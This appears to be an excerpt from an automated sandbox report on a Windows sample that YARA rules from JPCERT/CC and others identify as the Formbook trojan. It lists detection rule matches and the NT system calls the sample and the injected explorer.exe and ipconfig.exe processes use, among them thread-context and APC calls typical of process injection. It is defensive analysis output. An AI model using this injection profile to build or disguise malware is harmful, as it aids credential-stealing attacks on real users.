            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 6796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: JHnNxt6Pnb.exe PID: 964, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: ipconfig.exe PID: 5460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A320 NtCreateFile,4_2_0041A320
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A3D0 NtReadFile,4_2_0041A3D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A450 NtClose,4_2_0041A450
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A500 NtAllocateVirtualMemory,4_2_0041A500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A31B NtCreateFile,4_2_0041A31B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A44A NtClose,4_2_0041A44A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041A4FA NtAllocateVirtualMemory,4_2_0041A4FA
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01A22BF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22B60 NtClose,LdrInitializeThunk,4_2_01A22B60
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22AD0 NtReadFile,LdrInitializeThunk,4_2_01A22AD0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01A22DF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22DD0 NtDelayExecution,LdrInitializeThunk,4_2_01A22DD0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_01A22D30
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22D10 NtMapViewOfSection,LdrInitializeThunk,4_2_01A22D10
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_01A22CA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01A22C70
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22FB0 NtResumeThread,LdrInitializeThunk,4_2_01A22FB0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01A22F90
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22FE0 NtCreateFile,LdrInitializeThunk,4_2_01A22FE0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22F30 NtCreateSection,LdrInitializeThunk,4_2_01A22F30
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01A22EA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_01A22E80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A24340 NtSetContextThread,4_2_01A24340
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A24650 NtSuspendThread,4_2_01A24650
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22BA0 NtEnumerateValueKey,4_2_01A22BA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22B80 NtQueryInformationFile,4_2_01A22B80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22BE0 NtQueryValueKey,4_2_01A22BE0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22AB0 NtWaitForSingleObject,4_2_01A22AB0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22AF0 NtWriteFile,4_2_01A22AF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22DB0 NtEnumerateKey,4_2_01A22DB0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22D00 NtSetInformationFile,4_2_01A22D00
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22CF0 NtOpenProcess,4_2_01A22CF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22CC0 NtQueryVirtualMemory,4_2_01A22CC0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22C00 NtQueryInformationProcess,4_2_01A22C00
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22C60 NtCreateKey,4_2_01A22C60
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22FA0 NtQuerySection,4_2_01A22FA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22F60 NtCreateProcessEx,4_2_01A22F60
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22EE0 NtQueueApcThread,4_2_01A22EE0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A22E30 NtWriteVirtualMemory,4_2_01A22E30
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A23090 NtSetValueKey,4_2_01A23090
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A23010 NtOpenDirectoryObject,4_2_01A23010
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A235C0 NtCreateMutant,4_2_01A235C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A239B0 NtGetContextThread,4_2_01A239B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A23D10 NtOpenProcessToken,4_2_01A23D10
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A23D70 NtOpenThread,4_2_01A23D70
            Source: C:\Windows\explorer.exeCode function: 6_2_115DEE12 NtProtectVirtualMemory,6_2_115DEE12
            Source: C:\Windows\explorer.exeCode function: 6_2_115DD232 NtCreateFile,6_2_115DD232
            Source: C:\Windows\explorer.exeCode function: 6_2_115DEE0A NtProtectVirtualMemory,6_2_115DEE0A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2B60 NtClose,LdrInitializeThunk,9_2_038A2B60
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2AD0 NtReadFile,LdrInitializeThunk,9_2_038A2AD0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2FE0 NtCreateFile,LdrInitializeThunk,9_2_038A2FE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2F30 NtCreateSection,LdrInitializeThunk,9_2_038A2F30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_038A2EA0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2DD0 NtDelayExecution,LdrInitializeThunk,9_2_038A2DD0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_038A2DF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_038A2D10
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_038A2CA0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2C60 NtCreateKey,LdrInitializeThunk,9_2_038A2C60
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_038A2C70
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A35C0 NtCreateMutant,LdrInitializeThunk,9_2_038A35C0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A4340 NtSetContextThread,9_2_038A4340
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A4650 NtSuspendThread,9_2_038A4650
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2B80 NtQueryInformationFile,9_2_038A2B80
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2BA0 NtEnumerateValueKey,9_2_038A2BA0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2BE0 NtQueryValueKey,9_2_038A2BE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2BF0 NtAllocateVirtualMemory,9_2_038A2BF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2AB0 NtWaitForSingleObject,9_2_038A2AB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2AF0 NtWriteFile,9_2_038A2AF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2F90 NtProtectVirtualMemory,9_2_038A2F90
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2FA0 NtQuerySection,9_2_038A2FA0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2FB0 NtResumeThread,9_2_038A2FB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2F60 NtCreateProcessEx,9_2_038A2F60
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2E80 NtReadVirtualMemory,9_2_038A2E80
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2EE0 NtQueueApcThread,9_2_038A2EE0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2E30 NtWriteVirtualMemory,9_2_038A2E30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2DB0 NtEnumerateKey,9_2_038A2DB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2D00 NtSetInformationFile,9_2_038A2D00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2D30 NtUnmapViewOfSection,9_2_038A2D30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2CC0 NtQueryVirtualMemory,9_2_038A2CC0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2CF0 NtOpenProcess,9_2_038A2CF0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A2C00 NtQueryInformationProcess,9_2_038A2C00
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A3090 NtSetValueKey,9_2_038A3090
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A3010 NtOpenDirectoryObject,9_2_038A3010
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A39B0 NtGetContextThread,9_2_038A39B0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A3D10 NtOpenProcessToken,9_2_038A3D10
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038A3D70 NtOpenThread,9_2_038A3D70
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4A3D0 NtReadFile,9_2_00E4A3D0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4A320 NtCreateFile,9_2_00E4A320
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4A450 NtClose,9_2_00E4A450
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4A31B NtCreateFile,9_2_00E4A31B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4A44A NtClose,9_2_00E4A44A
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03699BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,9_2_03699BAF
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0369A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,9_2_0369A036
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_03699BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_03699BB2
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0369A042 NtQueryInformationProcess,9_2_0369A042
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_00E33E6C0_2_00E33E6C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_00E3E08C0_2_00E3E08C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_00E371080_2_00E37108
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_04F800400_2_04F80040
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_04F8001E0_2_04F8001E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_004010304_2_00401030
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041ED754_2_0041ED75
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00402D904_2_00402D90
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00409E4C4_2_00409E4C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00409E504_2_00409E50
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041EE8A4_2_0041EE8A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041D7724_2_0041D772
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041E77C4_2_0041E77C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00402FB04_2_00402FB0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB01AA4_2_01AB01AA
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA41A24_2_01AA41A2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA81CC4_2_01AA81CC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E01004_2_019E0100
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8A1184_2_01A8A118
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A781584_2_01A78158
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A820004_2_01A82000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB03E64_2_01AB03E6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F04_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAA3524_2_01AAA352
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A702C04_2_01A702C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A902744_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB05914_2_01AB0591
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F05354_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9E4F64_2_01A9E4F6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A944204_2_01A94420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA24464_2_01AA2446
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EC7C04_2_019EC7C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F07704_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A147504_2_01A14750
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0C6E04_2_01A0C6E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01ABA9A64_2_01ABA9A6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F29A04_2_019F29A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A069624_2_01A06962
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D68B84_2_019D68B8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E8F04_2_01A1E8F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F28404_2_019F2840
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FA8404_2_019FA840
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA6BD74_2_01AA6BD7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAAB404_2_01AAAB40
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EEA804_2_019EEA80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A08DBF4_2_01A08DBF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EADE04_2_019EADE0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FAD004_2_019FAD00
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8CD1F4_2_01A8CD1F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90CB54_2_01A90CB5
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0CF24_2_019E0CF2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0C004_2_019F0C00
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6EFA04_2_01A6EFA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E2FC84_2_019E2FC8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FCFE04_2_019FCFE0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A32F284_2_01A32F28
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A10F304_2_01A10F30
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A92F304_2_01A92F30
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A64F404_2_01A64F40
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A02E904_2_01A02E90
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AACE934_2_01AACE93
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAEEDB4_2_01AAEEDB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAEE264_2_01AAEE26
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0E594_2_019F0E59
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FB1B04_2_019FB1B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01ABB16B4_2_01ABB16B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A2516C4_2_01A2516C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DF1724_2_019DF172
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA70E94_2_01AA70E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAF0E04_2_01AAF0E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F70C04_2_019F70C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9F0CC4_2_01A9F0CC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A3739A4_2_01A3739A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA132D4_2_01AA132D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DD34C4_2_019DD34C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F52A04_2_019F52A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A912ED4_2_01A912ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0B2C04_2_01A0B2C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8D5B04_2_01A8D5B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA75714_2_01AA7571
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAF43F4_2_01AAF43F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E14604_2_019E1460
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAF7B04_2_01AAF7B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA16CC4_2_01AA16CC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A859104_2_01A85910
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F99504_2_019F9950
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0B9504_2_01A0B950
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F38E04_2_019F38E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5D8004_2_01A5D800
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0FB804_2_01A0FB80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A65BF04_2_01A65BF0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A2DBF94_2_01A2DBF9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAFB764_2_01AAFB76
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A35AA04_2_01A35AA0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8DAAC4_2_01A8DAAC
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A91AA34_2_01A91AA3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9DAC64_2_01A9DAC6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A63A6C4_2_01A63A6C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAFA494_2_01AAFA49
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA7A464_2_01AA7A46
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0FDC04_2_01A0FDC0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA7D734_2_01AA7D73
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F3D404_2_019F3D40
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AA1D5A4_2_01AA1D5A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAFCF24_2_01AAFCF2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A69C324_2_01A69C32
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F1F924_2_019F1F92
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAFFB14_2_01AAFFB1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAFF094_2_01AAFF09
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F9EB04_2_019F9EB0
            Source: C:\Windows\explorer.exeCode function: 6_2_108790826_2_10879082
            Source: C:\Windows\explorer.exeCode function: 6_2_108820366_2_10882036
            Source: C:\Windows\explorer.exeCode function: 6_2_108865CD6_2_108865CD
            Source: C:\Windows\explorer.exeCode function: 6_2_1087AD026_2_1087AD02
            Source: C:\Windows\explorer.exeCode function: 6_2_108809126_2_10880912
            Source: C:\Windows\explorer.exeCode function: 6_2_108832326_2_10883232
            Source: C:\Windows\explorer.exeCode function: 6_2_1087DB326_2_1087DB32
            Source: C:\Windows\explorer.exeCode function: 6_2_1087DB306_2_1087DB30
            Source: C:\Windows\explorer.exeCode function: 6_2_10A140826_2_10A14082
            Source: C:\Windows\explorer.exeCode function: 6_2_10A1D0366_2_10A1D036
            Source: C:\Windows\explorer.exeCode function: 6_2_10A215CD6_2_10A215CD
            Source: C:\Windows\explorer.exeCode function: 6_2_10A15D026_2_10A15D02
            Source: C:\Windows\explorer.exeCode function: 6_2_10A1B9126_2_10A1B912
            Source: C:\Windows\explorer.exeCode function: 6_2_10A1E2326_2_10A1E232
            Source: C:\Windows\explorer.exeCode function: 6_2_10A18B306_2_10A18B30
            Source: C:\Windows\explorer.exeCode function: 6_2_10A18B326_2_10A18B32
            Source: C:\Windows\explorer.exeCode function: 6_2_115DD2326_2_115DD232
            Source: C:\Windows\explorer.exeCode function: 6_2_115DA9126_2_115DA912
            Source: C:\Windows\explorer.exeCode function: 6_2_115D4D026_2_115D4D02
            Source: C:\Windows\explorer.exeCode function: 6_2_115D7B306_2_115D7B30
            Source: C:\Windows\explorer.exeCode function: 6_2_115D7B326_2_115D7B32
            Source: C:\Windows\explorer.exeCode function: 6_2_115E05CD6_2_115E05CD
            Source: C:\Windows\explorer.exeCode function: 6_2_115DC0366_2_115DC036
            Source: C:\Windows\explorer.exeCode function: 6_2_115D30826_2_115D3082
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F639FE9_2_00F639FE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039303E69_2_039303E6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0387E3F09_2_0387E3F0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0392A3529_2_0392A352
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038F02C09_2_038F02C0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039102749_2_03910274
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039301AA9_2_039301AA
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039281CC9_2_039281CC
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038601009_2_03860100
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_0390A1189_2_0390A118
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038F81589_2_038F8158
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_039020009_2_03902000
